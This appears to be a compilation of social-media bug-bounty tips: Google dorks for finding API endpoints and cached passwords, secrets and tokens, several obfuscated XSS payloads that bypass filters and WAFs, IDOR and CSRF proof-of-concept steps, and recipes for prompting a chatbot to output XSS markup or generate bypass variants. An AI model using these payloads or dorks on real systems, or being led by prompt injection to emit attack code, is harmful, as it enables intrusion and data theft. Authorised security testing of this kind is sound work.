Google Dork - API Endpoints ⚙️
site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3
Find juicy API Endpoints for further testing 🎯
Google Dork - Sensitive Info
inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:target[.]com
Emails/phone#s/tokens commonly cached directly in Google
XSS-Bypass Anatomy
Final payload after working hours on a bug bounty target w/ both XSS filters & WAF:
%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
My favorite Google dorks - Part 3:
OR - Include both queries
& - Require both queries
intext: - Appears in the page
Example:
(site:site:tesla. com | teslamotors. com) & intext:"choose file”
#bugbountytips#bugbounty#hacking#infosec#recon#seo
Tips for getting into bug bounty and web pentesting:
1. Don't worry about certs, just hack or build something
2. @PortSwigger Web Security Academy: portswigger.net/web-security
3. Hack on a VDP until you get your first vuln
4. Build a tool or web app
#bugbountytips#infosec
XSS via Prompt Injection 💥🧠🔓
🤖 Find a chatbot
🧠 Ask what model it is
🔁 Get it to repeat text
⚠️ Make it say: '"><img src=x onerror=alert()>
💥 Escalate to Reflected/Stored XSS via URL param
XSS Bypass - javascript: URI
If you can inject these tags:
<a> <iframe> <object> <embed>
But, "javascript:" & "data:" are blocked
Try these obfuscation techniques:
java%00script:
java%0Ascript:
java&tab;script:
Example:
<a href="java%0Ascript:al%0Aert()">click</a>
Google Dork - Find Bug Bounty programs:
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" -inurl:news -site:*.de
Last two bits reduce noise, but you can remove them.
#bugbountytips#bugbounty#infosec
XSS filter bypass:
<embed src="javascript%26%63%6f%6c%6f%6e%3balert()">
The url encoded portion is the html entity for colon:
:
#bugbountytips#bugbounty#XSS
XSS on a login page while stuck in an input tag with <> filtered. Final Payload:
" formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src=""
Also gets around "javascript" and "alert" blacklist with html entity Tab obfuscation.
#BugBountyTips#bugbounty#XSS
XSS Fuzzing w/ ChatGPT
Prompt #1:
explain this: javascript:alert()
Prompt #2:
show me alternatives
Customize Bypass:
list 10 that don't use the word "alert" intact
Weird IDOR I've never seen before:
1. User 1 updates at /api/account
2. User 2 registers at /api/register
3. Change userID for /api/register from User 2 -> User 1
🤯 IDOR succeeds - User 2 changes account details of User 1 via registration endpoint
#bugbountytips#infosec
P1 IDORs & BAC w/ Auth Analyzer Burp Extension:
1. Copy/paste session cookies from different users
2. Start Analyzer
3. Do things in browser w/ user 1
4. Look at SAME responses for any requests that user 2 can do that should only be accessible for user 1
#bugbountytips#hacking
Google Dork - Unlisted Bug Bounty Programs 🐛
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" reward -site:hackerone[.]com
Some programs don't want to be listed in the directory; you can only access them directly via their site.
Easy CSRF and POST XSS PoC:
1. "Generate CSRF PoC" in Burp
2. Copy HTML
3. Paste into Decoder
4. Encode as Base64 and copy output
5. Paste it to the end of this URI:
data:text/html;base64,<Base64 here>
6. Open the link to activate CSRF
#bugbountytips#csrf#xss#infosec